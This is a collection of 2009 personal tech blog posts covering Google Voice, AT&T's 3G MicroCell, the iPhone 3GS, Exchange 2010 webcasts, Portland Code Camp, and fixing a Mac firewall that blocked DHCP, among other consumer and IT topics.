Google Voice is awesome. It's the greatest service you can't get yet today. One number for all my phones, for life, replete with text messaging capabilities and a whole slew of cool features.

But, as much as I love Google Voice, I will stand on my soapbox here for a few moments to yell into the ether about a couple of glaring omissions in the current release that I think Google should address sooner rather than later: MMS message support, and support for sending a mobile message (whether SMS or MMS) to multiple recipients at the same time.

MMS messages are multimedia messages and are sent much like a text message. They're different than SMS message sin that they might include a video or a picture. Right now, if I want to receive a MMS message, I have to tell people to send them to my actual cell number, not my google voice number. Why? Because Google Voice quietly and calmly eats MMS messages, never to be seen again. This completely defeats the purpose behind the "one-number-for-them-all" story. So, it needs to change. When the iPhone on AT&T gets MMS service, which is likely to happen in July sometime, this need will become even more apparent and important.

MMS support could probably be delivered in two phases. Right now if you send a MMS message to the Google Voice number, it just disappears into the ether, and is never delivered anywhere. You don't even know someone tried and the sender assumes it was delivered. To rectify this, Google could do a first phase change where MMS messages would simply be forwarded in original form to the mobile phone(s) configured in the system, without worrying about displaying them in the Google Voice web interface. In a second phase they could then enable web-based viewing.

Second on my list is adding the ability to send an SMS (and MMS as a bonus) message to a group of recipients. We already have contact groups, and we can select more than one contact at a time in the web interface, but the option to send a SMS message disappears from the user interface as soon as you select more than one recipient. I regularly use SMS messages to notify members of a church youth group about meetings and other announcements as a group, so enabling a group-send as well as select-multiple to send SMS would be huge for me. As a bonus, provide me with a phone number that is virtually tied to that group so I can send one txt to my group number on my mobile phone.

What features would you like to see added to Google Voice?

The latest news via Unstrung's Michelle Donegan is that AT&T's 3G Microcell, which has been in a limited and private beta in the United States for a few months now, will be available in a sort of public beta in the coming weeks, in select (and as-yet unnamed) cities. The 3G Microcell is a device that you plus into your broadband connection at home. It has a 3G transceiver built in, and allows you to create a small cell area of coverage (hence the name "microcell" of course). I've written about it before, here and here.

From the news article:

According to AT&T's executive director for radio access network delivery, Gordon Mansfield, who was speaking at the Femtocells World Summit in London today, about 200 users are testing the femto service in targeted customer trials.

In the coming weeks, he added, "we will expand that into a marketing trial of the AT&T-branded 3G Microcell, which will be open to customers through our AT&T stores… in a handful of cities.

"We're on track for a full national launch by the end of 2009."

The equipment comes from network infrastructure equipment giant Cisco.

I'm hoping that Portland is one of the metro areas they include in the text phase, since my home has pretty much zero coverage. But I do have broadband and would truly benefit from the product.

AT&T plans to add a whole bunch of 850 Mhz spectrum to it's 3G service infrastructure, which should improve it's network performance and capacity substantially. Many have experienced the dropped call and unavailable network performance issues on AT&T's network, so this is a welcome change. But for those of us who simply live just outside the workable coverage area, the 3G Microcell will open even more doors for its customers.

Today Apple announced the next rev of the iPhone, the "iPhone 3GS." It has beefed up processing power and some cool new features like a better camera, more storage, etc.

Normally I'd be ultra excited about getting one as soon as its available. But this time around, I'm having a hard time getting inspired.

It has nothing to do with Apple's hardware and software. In fact, the processing power boosts and other changes are very, very tempting, and in a world where all else was equal it would be a no-brainer for me to drop the early upgrade cash on the table and move on up.

But the fact of the matter is, with AT&T's ultra-poor network performance on my current iPhone 3G, I think I'm better off waiting until Apple adds another U.S. carrier. I consistently have to turn off the 3G capabilities on iPhone 3G in order to avoid dropped calls and to successfully get network connections. That was the case with the first iPhone 3G I had, too. To top it all off, the service has gotten worse recently in my experience. I just can't see dropping that much cash for a new phone to operate on a network that already sucks. I've been sorely disappointed by AT&T, almost to the point where I want to call them and tell them they've consistently failed to perform to the level of service they claim (which is 100% the case).

It's time for Apple to drop that bomb on AT&T. Failure to perform in this case is going to cost Apple market share. It's got to be embarrassing to the company. During the announcements made today at Apple's World Wide Developer Conference, every time AT&T was mentioned the crowd just laughed. Seriously laughed, and not because there was a funny joke. It was because AT&T's quality is so lacking one just can' t help but either laugh or cry. They even laughed when AT&T was not mentioned - most notably with regard the fact that the carrier's logo was missing from some key slides in the presentation, pointing out AT&T's lack of launch time support for MMS and tethering, two of the key selling points for the new phone model.

AT&T has turned into that partner that Apple doesn't need, and shouldn't want. It's time to make a change. AT&T has simply failed to perform. When you can't reliably make and maintain calls and the data network won't keep a connection between towers, something's just not good enough. I hope Apple will step up - sooner rather than later - and add another carrier or two even before AT&T's exclusive agreement expires. It takes two to be successful in any partnership, and in this one AT&T's turned into a bit of a boat anchor.

What would change my mind on this one? Simple: When my current 3G phones work like they should on AT&Ts network, I'll be the first one to say so right here. Out loud and with conviction. But, I'm not holding my breath quite yet.Tmobile

Maybe a good jailbreaking and switch to Tmobile will work on the new OS and device. I'm sure someone will figure out out. Desperate times call for desperate measures. We shall see.

Shorthand used to be reserved for stenographers and people who took dictation or a lot of notes. But for the vast majority of us it was never fun. Remember those days? Now shorthand is cool again, but in text messages sent and received on cell phones. And it seems as if everyone under 25 is doing it (as well as some of us old people).

Parents, if you're lost in the world of texting because the abbreviated vocabulary is confusing, no worries. Mobile phone manufacturer LG has released a new web site that allows you to decode txt message slang, and you can use it at http://www.lgdtxtr.com/.

So now you can get a better handle on what your kids are up to. Enjoy.

Exchange Server 2010 is just around the corner, and Microsoft is gearing up to present a month of webcasts starting June 1st to introduce the new version to us. The webcast schedule is below. You can get the beta of Exchange Server 2010 here.

6/1/09 - 9:00am PT: TechNet Webcast: Exchange 2010 High Availability
Welcome to the future! The future of Exchange high availability, that is. In this webcast, we reveal the changes and improvements to the built-in high availability platform in Exchange Server 2010. Exchange 2010 includes a unified framework for high availability and disaster recovery that is quick to deploy and easy to manage. Learn about all of the new features in Exchange 2010 that make it the most resilient, highly available version of Exchange ever.

6/3/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Overview
This webcast will introduce you to Exchange Server 2010, reviewing the major areas of investment for this release and highlighting marquee features.

6/8/09 - 1:00pm PT: TechNet Webcast: Exchange 2010 Management Tools
Exchange 2010 includes new capabilities that make the operation of your Exchange environment more efficient. Learn how we've made the Exchange Management Console more powerful, extended the reach of PowerShell, and made it easier to delegate management tasks.

6/10/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Archiving and Retention
This webcast will introduce new ways to address archiving and retention with Exchange Server 2010.

6/15/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Outlook Web Access
Exchange 2010 brings new features and functionality to Outlook Web Access. See product demonstrations of the latest capabilities and understand how browser-based communication and collaboration gets better than ever in Exchange 2010.

6/17/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Architecture
This webcast describes the overall architecture of Exchange 2010 and key considerations for the scalability and performance of each server role. This webcast will provide the background and framework for the other Exchange 2010 webcasts, serving as a bridge between the overview session and drill-downs in each product area. This webcast is a recommended pre-requisite for the Exchange 2010 transition and deployment webcast.

6/22/09 - 9:00am PT: TechNet Webcast: Federation in Exchange 2010
Federation is a key part of the architecture of Exchange 2010, powering new organization-to-organization sharing scenarios. Learn how federation enhances the capabilities of Exchange 2010 and enables advanced coexistence between Exchange Server and Exchange Online.

6/24/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Voice Mail enabled by Unified Messaging
Exchange 2010 Unified Messaging is Microsoft's second generation unified messaging and voice mail solution. In this webcast, learn about the features, benefits, and architecture of Unified Messaging in Exchange 2010.

6/24/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Information Protection and Control
This webcast will introduce you to new ways to address information protection and control with Exchange Server 2010. A discussion of the use of encryption and rights management in parallel with Exchange will be included as well as an introduction to new functionality in Exchange that supports information protection scenarios.

7/1/09 - 9:00am PT: TechNet Webcast: Exchange 2010 Transition and Deployment
In this session we will cover the migration planning and deployment path to move an organization from Exchange 2003 or Exchange 2007 to Exchange 2010.

If you're in or anywhere close to Portland, Oregon and you care about software development from a coder's perspective, there's a terrific (and FREE) event coming up on May 30th that you should definitely attend: Portland Code Camp 2009.

If you're interested in learning from cool, smart people or if you have some area of code passion you'd like to share with others (no experience necessary - seriously!), then go check it out and sign up now.

The 2009 Portland Code Camp is a free mini-conference that is a community-driven event by, and for people who write software. The event features sessions on all kinds of software and technologies, regardless of language, vendor, or platform. Code camp brings the software development community together, focusing on the common act of creating software. It is designed for all interest, all levels, and all ages.

Be a Presenter! The 2009 Portland Code Camp is a great opportunity to present a session on a piece of code, a technology, or a project that excites you. Share your knowledge and experience with others. If you've never presented in public before, code camp gives you a opportunity in a warm, friendly setting.

About this FREE Community Event in Portland

A. Concept. Portland Code Camp is a community event focused on the needs and interests of the developer community, and where we can learn from each other. Anyone is welcome to attend and anyone can propose a session on any development related topic. Final session selection is based on the interest expressed by those planning to attend. If the developer community is not interested in a topic, it just doesn’t make the ‘cut’.

B. Community. Portland Code Camp is about the developer community. ‘Real’ developers, not business interests guide all stages of planning for the event. And ‘real’ developers (those planning to attend) express their interest in session topics.

C. Cost. Portland Code Camp will always be ‘FREE’ to the developer community. There are no charges to attend any of the Portland Code Camp activities. We do raise funds from Sponsors, but Sponsors have no control over the sessions selected.

D. Sessions. Sessions may range from ‘white board’ discussions to down in the trenches coding. Session presenters should present materials that is their own original or derivative work, free of copyright encumbrances. All session materials, code samples, scripts, even slides, will be made available to attendees. Session presenters should only offer material, including code, that is available to re-use, adapt, and alter for the attendee’s own education, projects and even work.

E. Presenters. Anyone is encouraged to offer a presentation. Portland Code Camp provides a ‘low-key’ opportunity for inexperienced folks to make their first public presentation efforts. Some presenters will be experienced and some will be making their first public presentation. The Portland Code Camp audience is quite supportive of first time presenters. Most presenters will be from the Portland area, while a few may be from outside the area.

F. Code. Portland Code Camp sessions will focus on coding –with few exceptions. We encourage presenters to keep their presentations with the realm of ‘code’; a few sessions may have such informative value that they will be permitted without code. But such sessions will only occur if they garner sufficient interest (see paragraph ‘A’ above).

G. Schedule. Portland Code Camp occurs on evenings and weekends in order to reduce work related scheduling conflicts.

I recently took advantage of an in-store offer to replace my water-damaged 16GB iPhone 3G with a 8GB version for $199 with no contract extensions, just paid the money and walked out with it. And in my case I got to keep the old one, which makes a great WiFi-enabled MP3 player.

Apparently (according to reports) it's now official policy/program now for Apple stores to allow problematic iPhones where the water damage sensors (there are four of them) have been "tripped" (discolored do to extended water exposure) to be replaced with the same size and model for $199. That's a great move for people like me who do things like ski, boat and oh, I dunno... Live in the freakin' rain.

So, if you have a problematic iPhone that you have been told is not covered under warranty, you might be able to take advantage of this policy.

More info here.

When the now-long-forgotten HD disc format wars were just barely getting started, I jumped on the bandwagon early and bought the HD-DVD add-on drive for the Xbox 360 (at the original higher price, even). I also purchased a number of HD movies in the "Red" (HD-DVD) format and soon discovered the wonders of 1080p movies at home on the Xbox 360.

Ultimately, Blu-ray won the battle to determine which of the two competing formats would survive to become the industry standard. Today I rent Netflix movies in Blu-ray format whenever they are available, and there's nothing like the experience of great movies in high-definition in the home theater room with a 120-inch 1080p projected image and the sound cranked up.

I'm one of those people that buys movies I especially like or one that I'll want to watch again in the future. Unless it's really a favorite I'm more likely to rent from Netflix. Ever since the death of the red disc and the day I bought a PS3 (essentially to use as a Blu-ray player), I've wished I could play all my HD movies on the one device, just for simplicity's sake. But it doesn't work that way. I still hope for the day when a Blu-ray drive comes available for the Xbox 360, but I'm not holding my breath or anything.

Today I was reading blog posts from the past couple weeks and I saw that my friend Travis Illig recently mentioned a service from Warner Brothers called Red2Blu that allows you to take your HD-DVD's from that label and trade them in for the Blu-Ray version for a small fee per disc ($4.95). After creating a list of the Warner Brothers HD-DVDs you have at home on their web site and paying the upgrade fee with a credit card, you'll print out the PDF shipping label they provide, and then mail WB the cover art sleeves from the HD-DVDs you're converting to Blu-Ray. A FAQ covering common topics can be found here.

I just printed my shipping label and pulled all my cover art out of the HD-DVD cases. I'll ship it all off to WB tomorrow. It'll be nice to make the movie library a bit more consistent. I'll need to look to see if any of the other publishing companies have a similar program, but I was pleasantly surprised to find out that all but three of my HD-DVDs were from the WB label, so I'm pretty well covered. Here are the discs I'm able to convert:

Tech Crunch posted a list of Easter eggs - little hidden software treasures you have to search for inside a program to find. It's a good list, and has a few that I had forgotten about. Among those is what some say is the original software Easter egg (I beg to differ, it might be the first video game Easter egg - but we can save that for another day), from way back in 1979 in the Atari Adventure game (wow, I remember playing that one when it was new!).

Of course, Easter eggs aren't limited to software. DVDs have become a popular place to hide fun little things, too. The Lost DVDs are a good example of discs that have extra stuff you have to poke around to find. Web sites are also often sources of Easter egg fun, and http://www.eeggs.com/ is a good site to find out how to find the in a wide variety of places.

There are nine others in the TechCrunch list, plus a couple more scattered around in the (off-topic) comments. Check it out over at TechCrunch.com.

I had breakfast with a friend the other day. He's been writing some really cool iPhone apps and mentioned that he's wanting to focus for the future on apps that can be written and maintained cross-platform. He'll prefer to leave out the platform-specific "extra" functionality, he said, in order to be able to do the bulk of the work once and maximize the deployable surface area.

I got to thinking about this the rest of the day and came up with a whole list of questions for my friend. It's an interesting and logical approach, and certainly not wrong by any stretch of the means. Contrasted against the common move by devs to focus only on the iPhone platform for example, my friend's approach really makes me think. Now, to be clear, I have no idea what it takes to actually deploy an app to the iPhone and also have a version to deploy on Android or RIM devices, or on the upcoming Palm Pre (which looks really cool, by the way), or whatever. At least not without writing each one from scratch. My friend does, though. What I took from our conversation (as a business guy) was that it can be done at least to some extent, but that doing it in a cost-effective way means limiting functionality on any given platform. I may be oversimplifying, and in fact I probably am.

Then today I noticed that Mike Rowehl, who writes "This is Mobility," just posted an interesting article entitled "Please don't mistake my apathy for a lack of understanding," in which he takes on the recent meme suggesting that mobile developers are blindly leaving platforms other than Apple's behind, suck os Nokia's Ovi Store.

Which leads me to ask the obvious question: "What the heck is Nokia's Ovi Store?"

Granted, I'm not buying tons of mobile devices and deploying them like I used to, and certainly I'm not a mobile developer, but I'm still pretty well plugged-in (irony intended).

My past involvement in cross-platform development and porting of apps taught me that it's almost always a complicated and expensive endeavor. But it's not just building the app for the first time that one has to consider. Maintaining multiple platforms of the same app is can also be prohibitively expensive, unless there's a relatively simple and effective way to build once and deploy in many places/platforms. In the mobile world, it just isn't simple, cost effective and reliable enough (from what I can see).

And honestly, I want to choose the best devices and buy apps that take advantage of all the cool features those devices offer. I don't often want apps that leave out the latest hardware features and software enhancements.

Who's doing cross-platform mobile development and truly making it work? How are you doing it? If you've found the way, drop me a line - I'd like to hear about it.

For anyone who follows the "I always wait for the first service pack" method of deploying products, your excuse for waiting on SQL Server 2008 disappeared this past week, because SP1 for Microsoft SQL Server 2008 is now available.

Among the features, I like the slipstream install capability (install SQL server and the service pack in the same installation process), and the ability to uninstall the service pack separately.

Service Pack 1 for SQL Server 2008 is now available to customers. The Service pack is available via download at Download Center and is primarily a roll-up of Cumulative Updates 1 to 3 and minor fixes made in response to requests reported through the SQL Server community. While there are no new features in this service pack, customers running SQL Server 2008 should download and install SP1 to take advantage of the fixes which increase supportability and stability of SQL Server 2008.

The complete announcement is here.

UPDATE: We've had a great response and have assigned all of our beta invitations for the first round of testing, but please check the details below and let me know if you think you'd be able to help in a future phase!

I'm working with a software company to test some cool software that's currently in the early beta stage of development. The software is of a security nature and will be of interest to IT and security folks as well as individual computer users. We're looking for people with netbooks and notebook computers, especially ones with webcams built in, to test the software and provide feedback.

You'll be provided a test key and the beta software, and will need to honor the confidentiality provisions of the test program. It's nothing too complicated and the test risks are very small. You'll install the software, run through a few operational tests and let us know the results. We will ask first for technical results ("Did this work?") as well as your opinions and thoughts, should you wish to provide them.

What you'll need to provide and have available for the test:

• One or more notebook or netbook computers
• Computer(s) must be running Windows XP, Vista or Windows 7
• If it has a webcam built in, all the better (but not required)
• A Flickr account (basic account is fine)
• An email account and server information (for application configuration to allow sending of email alerts)

What you'll get as a result of testing and providing feedback:

• A free copy of the release version of the software when it's released (and you'll be glad you have it installed if your computer is ever lost or stolen, hint hint)
• Satisfaction and a sincere thank-you from me and the developers of the software

This software is quite interesting and has a lot of promise to provide real security value when it hits the streets, so we want to find as many complete test cases as we can. If you're interested, please email me at greg@greghughes.net and provide the details about your system, OS, etc - or call me at 503-766-2258. We are testing now, so let me know!

And thanks!

Since my last post, in which I predicted the newly-minted Google Voice service would be a real positive impact in my world, my Grand Central account was enabled for the upgrade to the new application and I have migrated to the service.

Greg’s One-Line Review: It’s pretty darned awesome.

But you probably want a little more detail than that, so here we go…

First of all, I should explain that I’ve used Grand Central for the past couple years. Grand Central was the centralized phone service that Google acquired some time back, and it allowed one number to ring multiple phones, with centralized voice mail, call screening and recording, etc.

Google Voice builds upon Grand Central by adding a number of new features, including a couple killer apps in my book: Text/SMS messaging and conference calling. Other enhancements include automated transcription of voice messages and a unified inbox for all your text messages and voice mails.

I live in a very rural area, far from the nearest cell phone tower. Mobile service on my iPhone is – for all intents and purposes – nonexistent at my house. If I put the phone up on a certain window sill and avoid moving it or touching it, I can get marginal service and might be able to receive text messages. But sending messages and making/receiving phone calls is next to impossible.

By giving people my Google Voice number (which is 503-766-2258 by the way), my friends and colleagues can send me text message and call me at one number, regardless of where I am and what services are available at my location. When someone calls the number, Google Voice rings my cell and home phones at the same time. I can add other phone numbers to the ring list, as well – on the fly. So, if I’m working from an office number I can add it to the list, no problem. I can define time periods to each phone, so individual phones ring only when I want them to.

I rely on text messaging for a lot of things, and many of my friends, family members and colleagues also rely on it to reach me. Needless to say, with poor wireless phone service at home, there are times when I don’t receive and cannot send text messages. That pretty much defeats the purpose of using text messaging to reach people in real time. With Google Voice, text messages send to my number are delivered to my phone and to my Google Voice Inbox, meaning even if the phone service prevents delivery, I get the text messages in my web browser and can reply to them there. That’s huge for me – and I have already taken advantage of the ability to send and receive text messages from my computer.

There are a few things I hoped I’d find in Google Voice that aren’t there, at least not there yet. I’m hopeful they’ll be added in the future:

• No support for sending text messages to groups – While you can create groups of contacts in the unified Google Voice inbox, you can only send messages to individual contacts. Since I lead a youth group at church, and we rely on text messaging to send out regular communications, I’d especially like to be able to send a single message to a group. As it is today, I can send a message to multiple contacts at once from my iPhone and just save the thread and keep replying to it, but when the group membership changes I have to start from scratch. It would be much easier and more reasonable to send to a single group managed in Google Voice.
• I’m a Google Apps user and have an Apps email account under the same Google account as the one I am using for Google Voice. I’m not sure why, but behavior is not as expected when I click on the Mail link at the top of the page from Google Voice. Rather than taking me to my Google Apps email inbox, it takes me to a page where it asks me to sign up for a GMail account. All other Google applications seem to understand where to go when that link is clicked, but this one doesn’t yet. I’m sure this is just early/beta stuff that needs to be worked out, but it also means my contacts are not synchronized across my Mail and Voice inboxes, which is unfortunate (they’ve already enabled unified contacts sync with GMail account inboxes).
• Support for syncing external contacts on the server side – While I was able to export my Outlook contacts, which are maintained on an Exchange server, as a CSV file and then import them without any issues into Google Voice, even better would be the ability to keep them up to date and in sync via the Google Voice service on the back end, maybe using ActiveSync or something similar. I’ll have to look for contact syncing software instead, since managing the sync effort by hand won’t really work for me.

All in all, Google Voice is a great app that’s already changing my ability to communicate. People in rural areas with marginal mobile service could really benefit from Google’s new offering. I’m looking forward to seeing what they deliver next!

I live in a remote location where you can barely get wireless service. I have to place my mobile phone on a window sill in just the right spot, and if I do that I will often get marginal service – enough to receive text messages most of the time, at least. Depending on the weather and atmospheric conditions, I sometimes get no signal at all.

There are two pieces of forthcoming technology that I plan to use to improve my situation as soon as they are available: Google Voice and the at&t 3G Microcell.

Google Voice was just announced late last week, and is an upgraded version of the services I already use via Grand Central, which Google acquired about a year and a half ago. Grand Central gives you one number and voicemail box for calls, and Google Voice expands in that by enabling SMS messages to the common number, with web and email access to the txt messages. I should note the service is free. The new features will be huge for me, since my ability to send and receive txt messages from home is limited at best, and often unreliable. I already have Grand Central routing voice calls to my home-office and cell phones at the same time, so the SMS addition will be welcome. Google is also adding voice mail transcription (machine transcribed) and some other nice features like built-in conference calling. They started upgrading people who already have Grand Central accounts a couple days ago, but mine has yet to be enabled for an upgrade. So, I am impatiently waiting. they say new users will be able to sign up in the coming weeks. More information about features available on Google Voice can be found here.

On another front, month or so ago, the tech news/rumor world was all excited about the pending at&t wireless 3G Microcell, which is a device that a user can plug into their broadband connection at home or in an office to create what amounts to a short-range personal wireless tower. I am luck enough to have terrific fast broadband service via a rural wireless transport provider called Cascade Networks, so I’ll be able to take advantage of the new at&t hardware when it’s available. Unfortunately, there’s been no news recently about availability of the 3G Microcell, but I’m hopeful it will be available soon. Having that available would enable me to consider shutting off my home phone service and possibly saving that monthly cost. The 3G Microcell is rumored to support data and voice for a few devices at a time, and who-knows in the cost department. All I know is it would improve my ability to communicate, which would be a welcome change.

More than once someone has asked me if there is a way to get Google to change their search results to exclude mean, inaccurate, defamatory, rude, or otherwise hard-to-swallow web pages. Often the desire motivating the question is legitimate, as someone has been smeared unfairly or - even worse - in a completely fabricated and malicious fashion, sometimes by anonymous online personalities.

The short answer is, "Probably not."

Now, before you think the proper solution is to have Google block the pages from their search results, it's important to understand that Google is not the Internet, and that it's not really making recommendations to you when it lists web pages that match what you're looking for. Rather, it's showing you an extensive list of links to content out there on the Internet that seems to match what you're looking for.

And that's what Google's search engine is: A way to find information created by other people and displayed on the Internet. It's not a filter that's meant to decide good from bad, who's right and who's wrong, who's lying or telling the truth, etc.

That said, there are things that Google works hard to avoid showing you. Spammy pages (especially ones that try to game Google's own advertising systems) are filtered out, and there are a couple topics that won't return results in their adsense and adwords advertising systems (just try to set up adsense on a site that sells or promoted firearms, for example). So they're not completely hands off, but for the most part they don't discriminate.

When you want to have a web page removed from the search listings at Google, the most effective (and almost the only) way to do so is to convince the person controlling the web page to change the information or remove it. If you can't get them to do that, it might be time to go to a court - assuming you have convincing proof that the page is inaccurate and/or malicious, etc.

Granted, if a judge sends Google a legal notice requiring them to take action, they'll probably do so. But good luck getting a judge to agree to do that.

Always go after the source of the problem. It's not Google's fault that some mean person posted a page that says you're a jerk and thief (even though you're not). But you might be able to convince a judge that the person you claim is defaming you should change or remove the page. If that happens, Google's indexing bots will automatically update the search results the net time they crawl the offending pages and see the content has changed.

Matt Cutts has a good article (with a great graphic) discussing this. Here's a brief excerpt of what Matt tells people when they ask him the same question:

We really don’t want to be taking sides in a he-said/she-said dispute, so that’s why we typically say “Get the page fixed, changed, or removed on the web and then Google will update our index with those changes the next time that we crawl that page.”

His post prompted me to think about this again since I get this type of question several times a year. Just keep in mind that while it's an emotionally difficult thing to have someone write mean things and lies about you for all to see, it's a relatively clinical process to try to get that information changed or removed. Just make sure you stay calm and look to the right people to help with driving those changes.

Google's official page that addresses how to remove content from the company's search results is located at:

http://www.google.com/support/webmasters/bin/answer.py?answer=136868

I dropped into a Starbucks this afternoon, all prepared to get some emails written and to get some work done between my Sunday afternoon and evening commitments. Everything was fresh in my mind and ready to go via the keyboard and onto the screen. I fetched my grande two-pump sugar-free vanilla skinny latte and sat down in the chair, opened the laptop and watched it wake up and connect to the AT&T wireless access point.

But much to my dismay nothing would load over the network. The AirPort icon in the status bar showed the name of the network and indicated that I was connected to the access point, but I had no connection to the Internet.

After a brief bit of trying over and over to load a web page, I checked the network preferences in the apple system preferences panel and found that I was not getting an IP address. The Mac was self-assigning a 169.* address, which is a non-routable local-only address. I tried restarting the AirPort card in the Mac, but that didn't help. I then found I was able to connect normally with my iPhone to the AT&T WiFi network and get a "real" IP address (192.x), so I quickly deduced that something was wrong with my Mac.

I had to give up on troubleshooting and head back out into the world, but I spent the rest of the day wondering if maybe there was something about the MAC address for my wireless card that AT&T had chosen to hate. After finishing my day of activities, I drove home this evening and fired my laptop back up. It connected to my home wireless network. But again, no IP address assigned. Hmm, definitely the laptop.

I started thinking now. What could be happening? Powering the AirPort on and off, shutting down the Mac and powering it back up, manually telling the network stack to renew it's DHCP lease - all these things did no good.

I finally decided to take a look at the Mac firewall logs. You'd think that would be the first place I'd look, being a security guy. They're kind of hidden in plain sight, a few layers deep in the Mac's preferences dialogs. You go to the System Preferences panel, in the Security section, then the Firewall tab, then click the Advanced button, and finally click the Open Log button. If logging isn't already turned on, you can enable it there, as well.

Sure enough, I looked in the log and found several examples of this (emphasis mine):

Feb 8 23:02:04 greg-hughess-macbook-air Firewall[39]: Deny configd data in from 192.168.0.1:67 uid = 0 proto=17
Feb 8 23:02:26: --- last message repeated 2 times ---

Ah hah... Apparently the firewall was refusing inbound connections initiated by the router as it tried to set up the DHCP address being requested by the laptop. The configd daemon is a service that handles configuration changes for various pieces of the system, mostly all network-related. Great, I had something to fix!

I first confirmed configd was in fact running, then deleted the firewall configuration file (located at /Library/Preferences/com.apple.alf.plist) and configured the firewall to temporarily allow all connections, and then back to allowing essential services. Sure enough, as soon as I made the changes the Mac was able to get a DHCP address from the router, and the network was back up and working.

I have no real idea how the firewall got messed up. At one point I had it set to configure access for specific services and apps, so that might have had something to do with it. But it's strange that this problem only started today. It's possible the configd process was denied by a rule, I suppose. Perhaps I hit a key on a pop-up dialog to deny firewall access to the daemon without even realizing it while typing?

At any rate, it seems to be working now (as evidenced by the fact that I am able to post this blog entry, of course) and hopefully it will continue to work as expected. Maybe this will help someone else troubleshoot a similar issue.

Good or bad, we live and work in an increasingly binary world.

More and more I notice our collective bipolar mentality. Everything is completely one extreme or another, with no time or thought put into the idea that there might be something much more realistic and reasonable in-between. It's black or it's white. You're conservative or you're liberal. It's all the way on or it's shut completely off. It's awesomely great or it's despairingly terrible.

What happened to the various shades and levels of gray, moderation and good? Perhaps this is a result of our increasingly computer-centric boolean society, where everything at it's core can be distilled down to one's and zero's, on and off, yes or no - with nothing in-between. But the organic world has never worked that way, and I think maybe we're seeing the signs that people have forgotten to look for the compromise.

One case in point, among many: A blog article today at TechCrunch reports that management at a large company, Nielson, has decided to remove the Reply-All button from all instances of outlook. Apparently some executive committee decided this would reduce waste and increase productivity. Certainly they must be right: It's a technology problem, right? Whoever the person was that thought of the reply-all concept originally couldn't possibly have been thinking about the consequences of including this feature. They must have been misguided, unknowing and wrong.

Or were they?

To take such drastic action as to completely remove the reply-all button from Outlook seems - well - misguided, unknowing and wrong. It takes a people problem, assumes (incorrectly) that it's a technology problem, and in the end creates a new - and potentially larger - business problem.

Don't get me wrong. I hate rampant reply-all email threads as much as anyone, maybe even more so. I especially dislike the passive-aggressive, nasty, insolent and rude behavior that people often use (often, ironically, in a reply-all email) to try to tell people how much they dislike email spam. If I'm copied on a business topic thread that I don't feel the need to review and would especially like to avoid, I don't like it. But I really hate it when people include me on their angry extension of the thread where they insult the original sender and complain. At least the original thread had a business purpose.

As a senior manager, several times I've replied-to-all to say "This thread is closed, please restrict the distribution of future info those those who are needed." In every case, the goal was to get people to stop and think. It almost always worked.

Now, I can see where accidental reply-all's and excess email would business and technology people to look for a way to just make it stop. I'm not saying there's not a problem to be solved - quite the contrary. But reply-all also provides a legitimate and useful piece of business functionality, one that makes people more efficient and in many cases ensures all the right people are in the loop.

The real problem here is people-related: There's a time and a place for using reply-all, and when people get lazy or don't think things through, the situation can become spammy, annoying and time-consuming. When it's useful it's very useful. When its misused it's a real pain.

Given that fact, taking the all-or-nothing, binary technology approach and removing the functionality entirely seems to be a poor method for dealing with is - at it's root - a people behavior problem.

In fact, for years there have been other options available. One example is the Reply to All Monitor (pay software, try code RA26BA50 for a possible 50% price reduction). There are other apps out there, as well. If you don't want to buy software, you can also program some VBA code to modify Outlook's behavior and prompt the user before they can send ("Are you sure you want to reply-all?"). Plus, there are a variety of ways to configure all your Outlook instances to use a plugin or your own VBA code. Of course, if you're removing the reply-all button from all the Outlook instances at a company, you probably already know this.

Imagine: Someone else might have had this problem and found a smart way to solve it. I guess the thing that really bothers me is what looks and feels like a reactive decision, likely made by people without complete information. Do you really want to completely disable all reply-all's, or is the true intent and desire to try to get people to think before they send, while allowing reply-all in cases where it makes sense?

Anyhow, I think you get the point. You can't really solve people problems with technology. Instead we should use technology to try to support people in behaving in the way we need then to. But in the end, it's all about the person's behavior, not the computer's.

Or you could say, "Buttons don't reply-to-all, people reply-to-all."

Although there's not a specific release date or price available yet, AT&T has posted some information on their web site that points to the future release of their new, in-home 3G cell station, which I mentioned here a couple weeks ago.

Engadget has some details about the device from the AT&T web site (details since removed from att,com, copied below), and images (like the one above) have started to show up on AT&T's site, as well. The pictures show two manufacturer names: Cisco on the case and Scientific Atlanta on the model/serial number label.

I'm looking forward to this, as I technically live outside the usable AT&T service area and can only occasionally/barely get a wireless signal at my home.

What is an AT&T 3G MicroCell™?

AT&T 3G MicroCell acts like a mini cellular tower in your home or small business environment. It connects to AT&T's network via your existing broadband internet service (such as DSL or cable) and is designed to support up to 10 3G capable wireless phones in a home or small business setting. With AT&T 3G MicroCell, you receive improved cellular signal performance for both voice calls and cellular data applications, like picture messaging and surfing the web for up to 4 simultaneous users.

Device Features:

• Enhanced coverage indoors - supports both voice and data up to 5000 square feet.
• Available unlimited minute plans - Individual or Family Plan.
• 3G handset compatible - works with any AT&T 3G Phone.
• Up to 4 simultaneous voice or data users supported.
• Device is secure - cannot be accessed by unauthorized users, easy and secure online management of device settings
• Seamless call hand-over - start calls on your 3G MicroCell and continue uninterrupted even if you leave the building.

Device Requirements:

• 3G wireless phone/device
• Broadband service over DSL or cable
• Computer with internet access for online registration

Additional Information:

• Installing your device near a window is strongly recommended to ensure access to Global Positioning System (GPS). A GPS link is needed to verify the device location during the initial startup.
• The 3G MicroCell device is portable. The device may be moved, provided the new location is within the AT&T authorized service area and properly registered online.

Microsoft has turned loose its Windows 7 Beta release to the public, and you can download it now. The beta times-out in the fall (it is a test version, after all), and is apparently limited to 2.5 million installs (product keys). You can learn more about the Windows 7 Beta release in our interview with Microsoft's Stephen Rose on RunAs Radio.

As of 11:45 a.m. Pacific time, the "profile.microsoft.com" servers responsible for the first phase of getting the new software were - not surprisingly - too busy. Try again later. We might see things improve in a few minutes (Update: no change after the advertised time, just to many excited people), since the official release time is actually noon Pacific time (GMT -8). But it would be unusual for TechNet to post the page without the software being rolled out.

TechNet Plus subscribers (only) should download the software here.

You can use a program like ImgBurn (cool little app) to put the ISO image on your writable blank DVD.

I already have my downloaded copy and key, so time to install it on my HP laptop machine now that I have some spare time available for the next hour or so.

